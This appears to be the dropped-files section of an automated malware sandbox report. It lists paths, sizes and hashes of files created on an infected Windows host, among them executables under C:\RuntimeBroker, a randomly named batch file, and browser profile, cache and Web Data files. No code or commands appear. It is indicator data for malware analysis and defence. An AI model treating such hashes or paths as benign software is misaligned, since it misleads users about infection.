49162a627752c74c7582e3e49582916868c0ebd5f2c0e63d20350f4137f6b932

SHA512
480b49860eb629c25c3c2098eacfb93133f68387579d317f557c3ac6c0547aa2d5c75dea00d0579bffc81342e7ab6879d660c692088f3f4e6bce1d6e1ce2f7bd

Download Submit
C:\RuntimeBroker\2.exe

Filesize
3.8MB

MD5
c320dd97eeac95f410c96139dbd6fe81

SHA1
2f308e0c80df13493369865259dc62a030c20743

SHA256
04295a59e29e0c30df0c22b4a29009bfdb299abc02a1cdfee505924a63183191

SHA512
0d434255211f69f6cb813afe1846ea07907044fd4f7034e928e844b82c94717377af83aeb31c5b0f45c43adfb75737c5fa0cea7a2125719726abc2b0968eeb94

Download Submit
C:\RuntimeBroker\3.exe

Filesize
1.9MB

MD5
b51ae5582d5571148782f4f8aa117ab3

SHA1
d0eef8f56d86242811c496f8645cf286e6c2f18e

SHA256
b1f30dbba023521d009ab0369f998ad9c18e22625327af928fff430003ca65af

SHA512
f512a83860ebfd65eccc23e9db0503ee5af7bf0f5fb2d9f0249ff4cf8d2c06fb6fcd4843fffcfd2037f9bc1d6a369fec53e5d711887a36518ea1fb536b694a4c

Download Submit
C:\RuntimeBroker\4.exe

Filesize
3.7MB

MD5
3120b36e0d37934ebaf01f21763ba26c

SHA1
ab01af62c76ae33780ce8d7ea87899d1780e35fe

SHA256
fa6d49c0a922ffffd586268353dbf47c3a2047b57555535df05976cdab9b74f1

SHA512
915fc0aecc51110487eba34b5c81eab2e8037265b4cb9474b81def20903bf3a21c40d22e6636a9222b3d5f96e26373cf947a290a49b0dfce25886c9143fabbd0

Download Submit
C:\RuntimeBroker\4.exe

Filesize
3.6MB

MD5
abb13c7871aaea78ed91d2321025004b

SHA1
692f9979cdf03217f7e58b8085d44306befbaf45

SHA256
6f95a74310bd6c66b5213e9fc0e27526df9e7766c1a66b296c27fefa2a2bbf58

SHA512
af2211fdfe5ab1dc3462b72fc629270983cd26c79868d6e8be064a3c374a8062b50ddd07709eacc875e25437c5c0993e3001a2dcb8477cf07e7b4e1e7eda14cc

Download Submit
C:\RuntimeBroker\4.exe

Filesize
3.5MB

MD5
df7bab462b07a492b2f362e443c9d524

SHA1
3e59d6a7839b9717ef658469c136aee7cd124b10

SHA256
0f45de899c00e80f07b72a019e02befcaa1a512ec332323c9794062777142b5e

SHA512
f0f45bd69728a4ebc433fb11730b8cce0683b472ed158e6b8906da7cf8955838191af4ebd4798c2b11890ae42f38633467dc75ba3a372313d6a492ccc9e4827b

Download Submit
C:\RuntimeBroker\h6MZtlz9b6ld7hEL8xRAUEYhnCmEpZ0.bat

Filesize
75B

MD5
bbb6faac9152a7e8fb98359eccb3bf61

SHA1
07cda498cdcf679c57eb940a34cc232ba253195c

SHA256
0ea49685b505ad04f6f60122f82d06b00fed1098b22fdb97b90742863b3f0942

SHA512
9c0637f9684ad298d0f8b4232f694f8cc4d108b52a808ff5cdaedd3b927b0df3891b1165eb509de9253a3378bdb5de9372544bffc68800281a6c072671b9ed94

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
a4473f388f5d64ea3a484a5a3199e6e0

SHA1
4ab4215850bf3ceb7d5723f8612a9fb19dec29d7

SHA256
1480d9c2a470569e23601933b615d5978eea115ceac0920785cf39afcff3af23

SHA512
8c4ccff83ac8b1e252c3dcfc1f4e69b06ba78f3670ad09b46b0e03c9b1f4ee62b11d5bb65f39bec3dc62dc87fe4fac7bd7b014380e0172a592cfe4fb0068785e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\aa490d6f-1046-4f89-9d96-06dc53695bac.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_0

Filesize
44KB

MD5
11a4fbeec463df0b5fc8d7bf2dc1db1b

SHA1
ccdb3eab33cac8a3fd9589f53a87407e8e1cf0fa

SHA256
760b13930fcac7867501f3c276cfe6f6fca462fb6f381d7259b5cb31487e6c15

SHA512
cf957e1b5b3c4fad43da5c08ab6a7e01a4b4ab6fc309949174daf704c851555b3b8615c66471047daa032aab41e7a9bd012e688dad765afda251342bb1960e2a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_1

Filesize
264KB

MD5
2427dc6bb6ce640a9b3b579c5a1e8d0d

SHA1
cc7c5dbc4de0abdb3bf1acc235e404c63f7a8abb

SHA256
155cc8c4224f514d926b6a8a460a693ace8b437ffa8407f8fbe4b9ea0fca1d3f

SHA512
86cabce2574aa3419f98a9c7be35bc1e350d5a140fd5f60a6569a0506469087feb286c0ad5ef8abfeb943608cce11d19fa136bf92bdc01d691f405ebdeb93c22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\GrShaderCache\data_3

Filesize
2.9MB

MD5
6186b3388abe919470aea6a50aa966e7

SHA1
4bb1fe60832e46ed34a48119bc2f7fe3bbbd5437

SHA256
1be2f37b56aa91c9da7dc132fad54315407f352d1fc1e28a0e4f14716c28f66f

SHA512
274024e6a6078ce0c074b339ea31ca35744be9dd207b344d23b72a112d3e1e448d6b6a818e88889a50d766876dc46fe8af9f3f9abd1aef46d5012eabb6e9dd32

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
78KB

MD5
e959733eb265aa2f560ccfcf69300fe0

SHA1
6270c6b01ef42fed65493863bdfd15c089fe4edd

SHA256
d872f0116352d2e0112e1f3dbe36a4012a5132b24fc1b0179cee62c1946c24bd

SHA512
82cd93e13acd1fd562d2a99af1427428ab6197bad7c39b5888e8287e6b7fa1142b5dc2c504ea060e1cf9970bd801785c623b54410d8136b8216737109b737073

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
16db91bda4bf597f8ac43dd48888b9f4

SHA1
4fe1ff26fed75689ccb220556869897a96bd9a9c

SHA256
1bf188b1f71525afb190e7333ed6ef1085ffc56068069d45317a780ce6a4f781

SHA512
13c94a36e614ab84877718be2fba60ca568aa0a82919429c180713b583980744e3e805ecccc0d82b9030c014264818ae8a9654bda54c842372ecddf487d4da45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
8cbb6d89e1063ce7436c0e34d76c443e

SHA1
7dccef17311e392e3184772475dc2185fb06427f

SHA256
777710593a88fa409636750d424a1b54b9c7dc17ae40a4cf7433d28caff59393

SHA512
a913b38c0a91c6fa7129341e53a564e727cd5757fb84bc1a0617405c13800e71f040279dfd0b0f3d5bc1e789bf92ca8df7874dcc911b0d47bb8d906c2705d134

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
6153a30e75d319234aeb9880af6c4dc1

SHA1
348af1d0c574cf480f920db03e86123c2d066518

SHA256
8ea46855fb1d79e5085c645a720e47f4a9618df0429a90020a2c3c8dc1c8876f

SHA512
7537c2c531fc7c8c69d9c069b5d9a12f45bbbcd30fde1de00ad8e90c474f9b87dfac10c6ecd0713eea57c2a94d63fec94a500138d441a24b947fb388be08ed85

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
280B

MD5
0c45ee0655e29b0a935a305e66bba8cf

SHA1
ad52868d94ba826e1f0b9db56d8fb7ff1c8fff2e

SHA256
d23f3010a3dd3688741250e254dd07d508883c099e1911c3e7d0854be85ca599

SHA512
479b8d020e5f818a452c050f27488928faed74c6d329ab58befc860f5bf76878efcdd03bd0eb7b83f22afb4e74aa40c7a0d6bb29677cb4cc03ff4dbd2687bb2d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
e05189e8d4fd49a355f2fd3691ecf9c1

SHA1
b8dd23115a7c7fd48fb02b46411ce34947958c35

SHA256
a932006598512f73511abbe1d113e3216e533b7d2983057d3efa828d0fecb866

SHA512
d7c7f628f28622f23d173424b9790c96f7fc8883be1acf7859620fb8e8355bcddbd061eb27a216cc1c004420df697a39dedd232d41424b9444e4912cf8bcbbf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
5f2880322c7eac27cc677dffefa5ac66

SHA1
c66ac6c9ab12a0048733c71f47cc1ea11e2472dc

SHA256
0b84219df9c108a08660e57351a91a038df2e3afc18dde9540c236178ba9b24b

SHA512
96d83af79fe7fd52a1582fdd09183aaa713dede46cac4ce4544df724921d1132305b02fa93458d2e6f8652568fd84fc383dfc7dbea3f930c063508324a0d6161

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_2

Filesize
1.0MB

MD5
c94847fc62513f1e387242f056ebfd3b

SHA1
c9b903fdfb2cec43da72f00681a1a795a55174ac

SHA256
55fb361450178bceb5825f34f6ad0d31151d1b1af1c91417ddd5438c13da3058

SHA512
faac12cae0c1ca8f7cb7ddbd8d6fb9ba8c8c2a25f583cd5de50f4b950aaf9e9d3393a2530aafe1ddde2fcb93ef05e5cbf9170f94db8a7fb4770e0f526a0cec7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\data_3

Filesize
3.4MB

MD5
d860343b6acf3102f964901fecc133f9

SHA1
bd0f46d445682b42882d9c87954bcdf1ed9b6175

SHA256
c1813cc0ced2621543dd183af765c09f8656c8faf5028553de48638c721112d1

SHA512
a252df9aee541a0fd5a209e945aa9ead64da2af56aa1df9e4b4641eec1ac8e4c3a1b5117e8c0199b6e77d8507f39e03c19f3e6e9f7fec1ce5dbdeabca53edf12

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007d

Filesize
34KB

MD5
04b4cc5e83e4b5c37284c177c7318c04

SHA1
8d141ed4a722185295059b98eef7dde112268ac2

SHA256
540ece2d4241326c93055dae883ec9c4d360cf56d24b62d3c3db31beafbe538b

SHA512
3f5d9a859a86911107152cc6a86a7e263189f84f788323a20cb7a65346b34c28732da3ba9c2d69ea13ebcc7cde67d0ca2f1be6535c332251cd3626b1c355e169

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007e

Filesize
100KB

MD5
f989b3df1da7e8451d64c0ffe01afd82

SHA1
6d40a628150a04b2ac77118d21aa0d9c390f9d8d

SHA256
b3dd5fa06cb6876e60aa8ca688701fb3d3632058904efeb7fc68ce8fe160aefe

SHA512
544d93570f305f9badc0ced4b257de50223769c779094e7d279d1270d8e409224a02eca6d2a887cad337371e43928cefaee10cb5c34bf43c6d1131364360a7da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00007f

Filesize
359KB

MD5
c659e7367ef7d6e3a7a8f1af3f081719

SHA1
24966f989863581ec11c5901903fcca55a22d86f

SHA256
6891eedd9f963af4db8d2cef70190fc8b8519ba40c67cafc67cd2bdf663575f2

SHA512
f42afe479be984ba441e1f06ce3fd17720daaf1384a2e270d7120bc8bc36bf33688cfc463429b0aba0ba5d5c18ad9cc08bb23cb1a77348e6ba3d5cffa8bbcb7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000080

Filesize
58KB

MD5
8bc6b2c854f71c0312f05ed48e97308f

SHA1
f34cb8ea8c5ba53b49738692e7b6261850f67320

SHA256
42b5fa5a7ac9a39c054d3dba3d3ea38fc0667fea0d562f86a3d374037f1c7b13

SHA512
68ec350e547a0e78823771315ed50636a1d2415852b6c612775bedb0e91dde2665d97553452caa8cadc5251fb750e143a72e3f2b01dc6c8c4a4f2c8320c2b1be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000081

Filesize
165KB

MD5
a33822b524f8de00bda9c830475d3443

SHA1
aa44622d586d3cd9dbbf72697052092be59f22ee

SHA256
ffcf1db1df488a0cc3fd415d5a9e9df044eb5a7372c16310d74091f8675ce65e

SHA512
8bb824189a25711c8b8206623a9ea21c839a8a999bb7eefb88de049d471be075639b111af5ec7e4a31660fccccffe4d2165b3cdef7fa188f021961f40fc21af3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000082

Filesize
71KB

MD5
79e65beabd38357d5216e81dfcc050ec

SHA1
61fe97a329c65d8f2beef8f631e3446dddf0dc04

SHA256
70d87e3d798dee9330d4b075b2d313171e87ed93f51a298a568d62cdd1b58ac7

SHA512
060755d0608297400e6040ddb8d1531688db636d10d5de52f36ad44206b2e6d5af0526173d8d2a5c1b70b8e10c50e2769c6984eefa1c285ac5433902fb1783a3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000083

Filesize
26KB

MD5
30a601af0f9bd1aa668db35bc945329d

SHA1
53046dcc67ea0559b3c5d26d6e384588e82c67c8

SHA256
1e4987038d24d8834ab7fe42193b3b4a93b62cdc081880b2e69f3eae726bb2cc

SHA512
3359c4546de3d69a11e8500820a05d5c54f21cbd39087406ce6fab71be5cc2d25c29d7bb5879b98b328ccb71cd5f45a32eee0f1cbbae13dc7384bc065817a8eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000084

Filesize
128KB

MD5
b48298c3fbd3e2b0164c6ed046792726

SHA1
545c45ae13f8121e802f507177c387ebdcdbe317

SHA256
d1ab5e3eb4211d83a8b04b88cf988f0a11aba7c04996f3f66dc4d3b20afa36a5

SHA512
2cfe1f65a33da7931110a3fa709557c35b397e3ba3fee67bdd3fdf0daecc4844df528894da67fa51659b0e297a0a0b9eb9613d50b911b698e0f99e08e7a7be1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000085

Filesize
71KB

MD5
8f850aaafc8da0df7f8f0a0b682a934b

SHA1
ef55df2e866abed76fe19b05ceb51c1147a6961f

SHA256
d40ca516a00f4b6ae9937cf0eaa8e1f0c2033aaf783dae3c461d68b8b142bc4e

SHA512
15160500824282d1e829908670dc7405abeb4d571ffdcf94532f55294fce77552c832f27fc14b91141ffd2aa142c441fd8e48df8e43cdbfe9283a043da2460dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000086

Filesize
128KB

MD5
e77d4a4bbf9cc52a064b108aa40aadee

SHA1
52766d1c7dcad3121ce67a9b6cfb5de703c9ded0

SHA256
3170e3205f49d04ae41b4c13237479a3a9a222accf4cdce9f4ea6b1032a7130c

SHA512
0093642af44c9b4c70ae72138dc9d8ba60bdac1f561e2052d0207d5671d40d5d27fc27ce18c7e91465b4aea371332783abae89ec47bce6da39e775168ac63e7f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000087

Filesize
67KB

MD5
5c9c51cdf7818044de18e75019fb268d

SHA1
43a8ce054dd42e7b76bbf20418bcad5dd579993d

SHA256
999556dcb1d4edbae3893e163430f8f7822020db52bcaba2a8f9428d93bd5310

SHA512
88ac0519957913c9663a6609fe2bf3fc0dbdc4af68bfef4d8a02294751ab9af7a3f88f0028a4b07d7f79be771069bd4d1c49115ab7c2dc5d13ee3f4a68f99d83

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000088

Filesize
58KB

MD5
557c3215b8d09f848bd88c7626ec628a

SHA1
8564d0d5ef1f61cd1b4fcf5cce2464410fce0f47

SHA256
ac1e7c3cc85c914952c6b6878d4c56095f7068575f18e7bcedb0a91d3a198025

SHA512
79f140c407c94b188f34e9ed85992f1a5c12488f8d0557a677d8b61b2e19a65a234572195680ba3e9c0749455ed67c6b73303cdd66ffe000f6318d7f63adebce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000089

Filesize
128KB

MD5
dda7a8ba5acc3661a2fd7ec6be8c3ba0

SHA1
f160ad1d4cd5cab8aafb0196a05c29afb5d19cac

SHA256
9cf9432e907ef3551fb3ec473e68db9ff364b50e658ee584b86b8d4258ed3cf1

SHA512
8a4f2249d7bea5574b473f913a1a8f97bd299cdaee84473d620477ae481992be6746cd62642c18f9a54df15ad5e3796bb7bf3d3f82bc8295300c8a72758e12f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008a

Filesize
72KB

MD5
3b7294abbcdb8aaa8dbe839f0ec84865

SHA1
53d555e31fa9016a9e75f3a24df0b29b84523df4

SHA256
e8e21b228c4d600a5e8134724e5f8b0b2d400a9e01f96f14ec7f73197ab34811

SHA512
18d1837930a491dde463cae12b435205cbf7036a3b021567a178ebf84af857cd4204e56962a43aae69d14bbf1e4ed7b40f33c48575d76be029e68eb1e220bceb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008b

Filesize
21KB

MD5
692b062598a56463f83fbd4924c0bdfc

SHA1
de2240de95a063b8d34d648649d380b561f1f98c

SHA256
096e82e0553d7162ce7ab59c76aab5ee6f3568e0fcb32fef84d36f398e3096cb

SHA512
9d34cbe1bf14f8166c8cabcc7affea6c7eaeebe162659a5906b5765d011f4448ccb7ec6e923da0734e0996c26fab39bb583f38fd1f6094613b46624685f72b03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008c

Filesize
128KB

MD5
27c056b0a2fda44b1b99669359f5f1be

SHA1
98fe071961d8c4fdc0a2f394a1edcac054457eda

SHA256
a47c98e13fc99b6174e3e30c611b4f7647af4ae923cee4c133b4afe76bad6eff

SHA512
52a9c50b821ddea9b09e31111a9bca2297736858a6fc0bd8bbc0541cbbf492804fbd8336287202550a27149dfcd2f853ac95eba2643247b700a45c250b4cfe38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008d

Filesize
62KB

MD5
2c46cffbdcc1e68c2737966bcf69c809

SHA1
95c87f727319d969a3148d52e6206b5f010e8912

SHA256
f9f26bacd62a3e5b2b69d4e6a32674cb514bf8fec3341e7807fd942b6cf98ff9

SHA512
e826c327cb2df2084ccf72972fb0010c853341c65ef99eac9a26b4013b59a1f8c29572b684ce325db83e26ae03fe67b69ebb13c21f0f4b8cbe67ac65bf7d50a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008e

Filesize
17KB

MD5
6793fa249dd0a792d9dcbbff58116244

SHA1
94b552bc0c89b6bf18275e90559ebf0ab038a817

SHA256
04acff19eb7dabe3daea20e107798e785b84f8bd57d8457c75ff2e587c392beb

SHA512
76623bac3620d530c95c044aa103042c5725c96e54c171f5dab7488d6e5e57c6c52829709b48fb4df9570b0112e28e3b0731c2857cbd02ecb0caa4d73297c571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00008f

Filesize
134KB

MD5
85f9094019fe728eff1695b6fed47ce4

SHA1
7670785f6818580f75fdaa9533c122b7883e8e20

SHA256
e1189fed5bd807cfc7391ca5ed0608aa522e65d091e72a5dce2ad8dfb21283f6

SHA512
d39681015e8db2b2eb599470c7d49dd9f611b28d3956370d21f5f9d7cf841af0f51ff76232fbc14614f0d99148fe1cf3ab2da9b4216687dd1082bfffa04e4d7d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000090

Filesize
37KB

MD5
39cac65111f294883f835936bc6d0bf1

SHA1
8b2e17490e7ff20e0d284ead07a18b08599f70b2

SHA256
aed0df9ea183c6c25067026755140505f431e31f35dcc90d755818b7f045430c

SHA512
c9ece8e831e1cdedbc23f0341cb5cbc4cea06414935f2de21df76a53470426a89ac57d7f135dab7df015825fc8b94ecd024a7121454edfdf4e86c240cd2e4bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_000091

Filesize
19KB

MD5
8906181a1838b7c238c5adeb620b9884

SHA1
8d599ba37776f64e64881703f13dc8cb31e9e7da

SHA256
a3165cfe81d4d16fc14ff0e4858bdea74ba1b572eef3f1bde01dbab91b80af1d

SHA512
49d19d31a859910001b5b99d424ea6a39e131cc98c121d5b751623b125f14163c409ecbd7f6b3b5e14e3227d64657ed32ef613eea2223089b56b90a4c311439e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_0000d0

Filesize
165KB

MD5
3391368d36d12df98188e1dc01f5b152

SHA1
3b0b053e7067c0885f445b48be1c28c791d99d1c

SHA256
54375f1024320d40c2c7e8df22c94c8c254a0d2c0c093c0c4d51bce9323b0d40

SHA512
c04be7e07c973fedb6afa9bdc6fa12620143312d6e16be98bcffeec9ad4422e8693ddfb880964e5f2a9d17d69a1d89501210ad89e132decfaab2192be897696f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

Filesize
40B

MD5
20d4b8fa017a12a108c87f540836e250

SHA1
1ac617fac131262b6d3ce1f52f5907e31d5f6f00

SHA256
6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

SHA512
507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\21cadfbf-a7e3-4662-88e0-29f664fa1dcc\index-dir\the-real-index

Filesize
2KB

MD5
7c88a491403d608878f4afc2ac9f627d

SHA1
7c5ea28618c648165b8df2d19c58f81ce7104b58

SHA256
3d3af8f268ae019cf1b1a3f4725d0749f5edd49b878ce1026c1d256ee1d606a2

SHA512
12a905046ba0db9cb32a29822c12895cfdafdb4b0ef2e45ce4d4f81d21f7552d462baf383ba3cdd5e89dff5c29889783b924281bafdc1eb94d8fd127cdad028a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\21cadfbf-a7e3-4662-88e0-29f664fa1dcc\index-dir\the-real-index

Filesize
2KB

MD5
e43aac4f37017cbd5271772f5824f582

SHA1
ad5f30808d6c8d41b796b639c82fe6a0e77a15c7

SHA256
e926bf5da31b7570172d2edb1292b6b324204d74baae60277410427bd3c92367

SHA512
e24d2d829f319a65da61638edd5db3db3bd3d2466eac6e8ac8e173789dab732b10353de0fb8cf20a1969372146fd2e52d40113c8136400c482882b39df481e1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\21cadfbf-a7e3-4662-88e0-29f664fa1dcc\index-dir\the-real-index~RFe577d7d.TMP

Filesize
2KB

MD5
02365a80fccbe9d654caf48c62fda5fa

SHA1
e426d0898a22b9d25e77398d1a93c75ec03ca625

SHA256
ccb84dab175ba7c8852a5f8631d913b69924fc08096ea49a6e3a1928870431f2

SHA512
758a3f0a3dd0debd991e7641556e69b0bf7268e9feea52705520a08b4908bec35776f228d2a75a0bda1245a0628b7c7212cc593aca0a951c746f1830dfef6f02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\21cadfbf-a7e3-4662-88e0-29f664fa1dcc\index-dir\the-real-index~RFe57b9ab.TMP

Filesize
2KB

MD5
2695cf8ffa7d69bf6d931175fe012653

SHA1
98aa08661964330be02336cc80d062fe989b294f

SHA256
75227c1fc00c2bc083c2fae8d5e115f084382d66ff9209751e6d0e2a58c245da

SHA512
a8440cecd0bf227cb2886e180c843bde5f932f2a1de737eddbc4a8e2d202f72d9c8d2ded00eee311983151ac71113c6cf8cadd8675827480b4fe1954e422bf1e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
285cef0ed39b24ffa2cf9a4c8d3080bd

SHA1
cb30347ef93ccd72fd7b5b718111e8318af037aa

SHA256
8f6fb5af590a3504045a10902a29f1b6b272118d21f53ee6272258ce72509303

SHA512
b9f9584734f6bfabd815003594a563ce150fdf7bfa3d0011d9572deacecf438299f89878f4a642e969b0cb773d5b0b66e5505117c47ac2913825acafacb7f2a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
f78dab910c24d055d3dd183426010737

SHA1
5b6c0ef5d3317199fc7362075294de2a308c81cc

SHA256
b48448221c4f06d575bd83cd7a818f11373672cf6b41f9a3d2455b56c59d1786

SHA512
026d7eeb883bbd94f7ace6d2304bac85b61f987b4f10d50d69440f22f1ad45749e8821a286d9f01eb1612df11ff0cbf92859ddc8c17c8558c6976b057b59c449

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Filesize
228KB

MD5
49ab2cabea27f0c7c4de83f4b10fbc19

SHA1
ff9ec5f7133659b942d24ce05c841388103b7783

SHA256
91c72a9465187e659ad5035f5fc983ba8f550b14b5eb742b54e0b55609b2e59c

SHA512
8cd26c60420627ab7cbdc872a5bd28824bc9d67a6849a078c54e023a7b532fe166078bd4413c81a15e6911f4a215c1d46e9fb3f38339d401cf0b5b65efa021c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
13B

MD5
3e45022839c8def44fd96e24f29a9f4b

SHA1
c798352b5a0860f8edfd5c1589cf6e5842c5c226

SHA256
01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd

SHA512
2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
b823431f313b80a1d5bc9403b3101488

SHA1
af4f597608fc18584c7dbf8b72c2f20b4936aa41

SHA256
e68b4d32d2c98817ce5b1657a27fcf94f7cd8c06dd725b392921f9e5ff75f28f

SHA512
074744a9d17c23be41046765710a010fcb722146665901bbb09c7ca64f0aa2ecc670e8f02295b6fdbe00ec871d3828dcb32000d2b83933a2ffdb05df95694db6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
40KB

MD5
b033014247ff73f8d76b12c3ada821a9

SHA1
ee68abc2ebb48d792f17202293077fa1b370df9a

SHA256
32f04cc07ab86c34b174b71cc1d6da0cea936d15605a3189b5d683ba8179ae61

SHA512
eb50fe940dc6b36d17825977912ebc0220ee5a65cc799a35c6f32de30604bfa8f0b76e81c285433a255b7ff5987021d91811107abeb21161b07ea21ada4cc90f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Variations

Filesize
86B

MD5
16b7586b9eba5296ea04b791fc3d675e

SHA1
8890767dd7eb4d1beab829324ba8b9599051f0b0

SHA256
474d668707f1cb929fef1e3798b71b632e50675bd1a9dceaab90c9587f72f680

SHA512
58668d0c28b63548a1f13d2c2dfa19bcc14c0b7406833ad8e72dfc07f46d8df6ded46265d74a042d07fbc88f78a59cb32389ef384ec78a55976dfc2737868771

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
1a9fa92a4f2e2ec9e244d43a6a4f8fb9

SHA1
9910190edfaccece1dfcc1d92e357772f5dae8f7

SHA256
0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

SHA512
5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

Download Submit
